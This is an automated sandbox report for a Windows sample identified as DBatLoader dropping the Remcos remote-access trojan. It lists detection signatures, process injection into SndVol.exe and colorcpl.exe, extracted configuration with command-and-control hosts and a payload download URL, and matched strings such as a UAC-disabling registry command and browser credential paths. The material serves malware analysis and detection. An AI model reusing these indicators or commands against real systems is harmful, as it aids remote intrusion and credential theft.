Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Fnvtdhenapsfwu.exe

Overview

General Information

Sample Name:Fnvtdhenapsfwu.exe
Analysis ID:1303888
MD5:cffe529403460c6affe0f52c1e7de602
SHA1:3e03898f87c2cc47d57893c3dd55302281e9f2b5
SHA256:56a3dc5c90ade897e349ba0fd0433770dcdda32b5bd2a1c6608b2af2f9b34c05
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Remcos
Antivirus detection for URL or domain
Found malware configuration
Yara detected UAC Bypass using CMSTP
Contains functionality to bypass UAC (CMSTPLUA)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Yara detected DBatLoader
Multi AV Scanner detection for dropped file
Contains functionality to steal Firefox passwords or cookies
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Contains functionalty to change the wallpaper
Drops PE files with a suspicious file extension
Writes to foreign memory regions
Delayed program exit found
Contains functionality to modify clipboard data
Contains functionality to steal Chrome passwords or cookies
C2 URLs / IPs found in malware configuration
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Yara detected Keylogger Generic
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Contains functionality for read data from the clipboard
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to simulate mouse events

Classification

  • System is w10x64
  • Fnvtdhenapsfwu.exe (PID: 7056 cmdline: C:\Users\user\Desktop\Fnvtdhenapsfwu.exe MD5: CFFE529403460C6AFFE0F52C1E7DE602)
    • SndVol.exe (PID: 7120 cmdline: C:\Windows\System32\SndVol.exe MD5: 1EF1A9B89A984DD25DB61DC1AF2548B8)
  • Fnvtdhen.PIF (PID: 6264 cmdline: "C:\Users\Public\Libraries\Fnvtdhen.PIF" MD5: CFFE529403460C6AFFE0F52C1E7DE602)
    • colorcpl.exe (PID: 6388 cmdline: C:\Windows\System32\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Host:Port:Password": "tornado.ydns.eu:1972:1orifak.ydns.eu:1972:1", "Assigned name": "ES 5th", "Copy file": "remcos.exe", "Mutex": "RmEEESSSssss-3AINT8", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos"}
{"Download Url": "http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/Fnvtdhenaps"}
SourceRuleDescriptionAuthorStrings
Fnvtdhenapsfwu.exeJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\Public\Libraries\Fnvtdhen.PIFJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
      SourceRuleDescriptionAuthorStrings
      00000001.00000002.474312952.00000000007D5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000008.00000002.253206056.0000000002AB1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000008.00000003.253042102.0000000002AB1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                Click to see the 27 entries
                SourceRuleDescriptionAuthorStrings
                1.2.SndVol.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  1.2.SndVol.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    1.2.SndVol.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                    • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • 0x6497c:$s1: CoGetObject
                    • 0x64990:$s1: CoGetObject
                    • 0x649ac:$s1: CoGetObject
                    • 0x6e938:$s1: CoGetObject
                    • 0x6493c:$s2: Elevation:Administrator!new:
                    1.2.SndVol.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6aaa8:$a1: Remcos restarted by watchdog!
                    • 0x6b020:$a3: %02i:%02i:%02i:%03i
                    1.2.SndVol.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x64b6c:$str_b2: Executing file:
                    • 0x65bec:$str_b3: GetDirectListeningPort
                    • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x65718:$str_b7: \update.vbs
                    • 0x64b94:$str_b9: Downloaded file:
                    • 0x64b80:$str_b10: Downloading file:
                    • 0x64c24:$str_b12: Failed to upload file:
                    • 0x65bb4:$str_b13: StartForward
                    • 0x65bd4:$str_b14: StopForward
                    • 0x65670:$str_b15: fso.DeleteFile "
                    • 0x65604:$str_b16: On Error Resume Next
                    • 0x656a0:$str_b17: fso.DeleteFolder "
                    • 0x64c14:$str_b18: Uploaded file:
                    • 0x64bd4:$str_b19: Unable to delete:
                    • 0x65638:$str_b20: while fso.FileExists("
                    • 0x650b1:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 57 entries

                    Stealing of Sensitive Information

                    barindex
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\SndVol.exe, ProcessId: 7120, TargetFilename: C:\ProgramData\remcos\logs.dat
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/Fnvtdhenapsll&=Avira URL Cloud: Label: phishing
                    Source: http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/FnvtdhenapsfAvira URL Cloud: Label: phishing
                    Source: http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/FnvtdhenapsDLLq/Avira URL Cloud: Label: phishing
                    Source: http://wsvdyhrgebwhevawe.ydns.eu/Avira URL Cloud: Label: phishing
                    Source: tornado.ydns.euAvira URL Cloud: Label: phishing
                    Source: http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/FnvtdhenapsAvira URL Cloud: Label: phishing
                    Source: http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/FnvtdhenapsDLLAvira URL Cloud: Label: phishing
                    Source: Fnvtdhenapsfwu.exeMalware Configuration Extractor: DBatLoader {"Download Url": "http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/Fnvtdhenaps"}
                    Source: 00000001.00000002.474312952.00000000007D5000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "tornado.ydns.eu:1972:1orifak.ydns.eu:1972:1", "Assigned name": "ES 5th", "Copy file": "remcos.exe", "Mutex": "RmEEESSSssss-3AINT8", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                    Source: Fnvtdhenapsfwu.exeReversingLabs: Detection: 62%
                    Source: Yara matchFile source: 1.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.6190000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f194e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.619194e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.6190000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f194e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.619194e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.474312952.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.253206056.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.253042102.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.253092372.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.253076423.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7120, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 6388, type: MEMORYSTR
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFReversingLabs: Detection: 62%
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00433789 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,
                    Source: SndVol.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                    Exploits

                    barindex
                    Source: Yara matchFile source: 1.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.6190000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f194e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.619194e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.6190000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f194e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.619194e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7120, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 6388, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_004074FD _wcslen,CoGetObject,
                    Source: Fnvtdhenapsfwu.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: Binary string: easinvoker.pdb source: Fnvtdhenapsfwu.exe, 00000000.00000002.218479200.000000000EB7F000.00000004.00001000.00020000.00000000.sdmp, Fnvtdhenapsfwu.exe, 00000000.00000003.213652513.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, Fnvtdhenapsfwu.exe, 00000000.00000002.220939596.000000007F4A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdbH source: Fnvtdhenapsfwu.exe, 00000000.00000002.218479200.000000000EB7F000.00000004.00001000.00020000.00000000.sdmp, Fnvtdhenapsfwu.exe, 00000000.00000003.213652513.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, Fnvtdhenapsfwu.exe, 00000000.00000002.220939596.000000007F4A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CB58CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0041C1E3 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0040C29B FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0044E749 FindFirstFileExA,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0040783C FindFirstFileW,FindNextFileW,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00419A47 FindFirstFileW,FindNextFileW,FindNextFileW,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0040BA7E FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0040BC85 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: tornado.ydns.eu
                    Source: Malware configuration extractorURLs: http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/Fnvtdhenaps
                    Source: global trafficHTTP traffic detected: GET /goofeeewsvd/Fnvtdhenaps HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: wsvdyhrgebwhevawe.ydns.eu
                    Source: global trafficHTTP traffic detected: GET /goofeeewsvd/Fnvtdhenaps HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: wsvdyhrgebwhevawe.ydns.eu
                    Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                    Source: global trafficTCP traffic: 192.168.2.4:49707 -> 193.42.32.61:1972
                    Source: Fnvtdhen.PIF, 00000002.00000002.253230097.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://://t.exet.exe
                    Source: Fnvtdhenapsfwu.exe, 00000000.00000002.216838629.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://://t.exet.exen
                    Source: SndVol.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: SndVol.exe, 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: Fnvtdhenapsfwu.exe, 00000000.00000002.216873929.00000000005C1000.00000004.00000020.00020000.00000000.sdmp, Fnvtdhen.PIF, 00000002.00000002.253289545.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wsvdyhrgebwhevawe.ydns.eu/
                    Source: Fnvtdhen.PIF, 00000002.00000002.255025032.000000000EC6C000.00000004.00001000.00020000.00000000.sdmp, Fnvtdhen.PIF, 00000002.00000002.253289545.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/Fnvtdhenaps
                    Source: Fnvtdhen.PIF, 00000002.00000002.253289545.00000000005C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/FnvtdhenapsDLL
                    Source: Fnvtdhen.PIF, 00000002.00000002.253289545.00000000005C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/FnvtdhenapsDLLq/
                    Source: Fnvtdhen.PIF, 00000002.00000002.253289545.00000000005A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/Fnvtdhenapsf
                    Source: Fnvtdhenapsfwu.exe, 00000000.00000002.216873929.0000000000591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wsvdyhrgebwhevawe.ydns.eu/goofeeewsvd/Fnvtdhenapsll&=
                    Source: Fnvtdhenapsfwu.exe, Fnvtdhenapsfwu.exe, 00000000.00000002.217337311.0000000002CD9000.00000004.00001000.00020000.00000000.sdmp, Fnvtdhenapsfwu.exe, 00000000.00000002.221331055.000000007FD20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                    Source: unknownDNS traffic detected: queries for: wsvdyhrgebwhevawe.ydns.eu
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00426C03 recv,
                    Source: global trafficHTTP traffic detected: GET /goofeeewsvd/Fnvtdhenaps HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: wsvdyhrgebwhevawe.ydns.eu
                    Source: global trafficHTTP traffic detected: GET /goofeeewsvd/Fnvtdhenaps HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: wsvdyhrgebwhevawe.ydns.eu

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0041680F OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,
                    Source: Yara matchFile source: Process Memory Space: Fnvtdhenapsfwu.exe PID: 7056, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0040B65C OpenClipboard,GetClipboardData,CloseClipboard,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0040B65C OpenClipboard,GetClipboardData,CloseClipboard,
                    Source: Fnvtdhenapsfwu.exe, 00000000.00000002.216873929.000000000057A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 1.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.6190000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f194e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.619194e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.6190000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.62f194e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.colorcpl.exe.619194e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.474312952.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.253206056.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.253042102.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.474788319.00000000062F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.474134003.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.253092372.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.253076423.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7120, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 6388, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0041C934 SystemParametersInfoW,

                    System Summary

                    barindex
                    Source: 1.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 1.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 1.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 1.2.SndVol.exe.62f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 1.2.SndVol.exe.62f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 1.2.SndVol.exe.62f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.colorcpl.exe.6190000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.colorcpl.exe.6190000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.colorcpl.exe.6190000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 1.2.SndVol.exe.62f0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 1.2.SndVol.exe.62f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 1.2.SndVol.exe.62f0000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 1.2.SndVol.exe.62f194e.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 1.2.SndVol.exe.62f194e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 1.2.SndVol.exe.62f194e.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.colorcpl.exe.619194e.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.colorcpl.exe.619194e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.colorcpl.exe.619194e.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.colorcpl.exe.6190000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.colorcpl.exe.6190000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.colorcpl.exe.6190000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
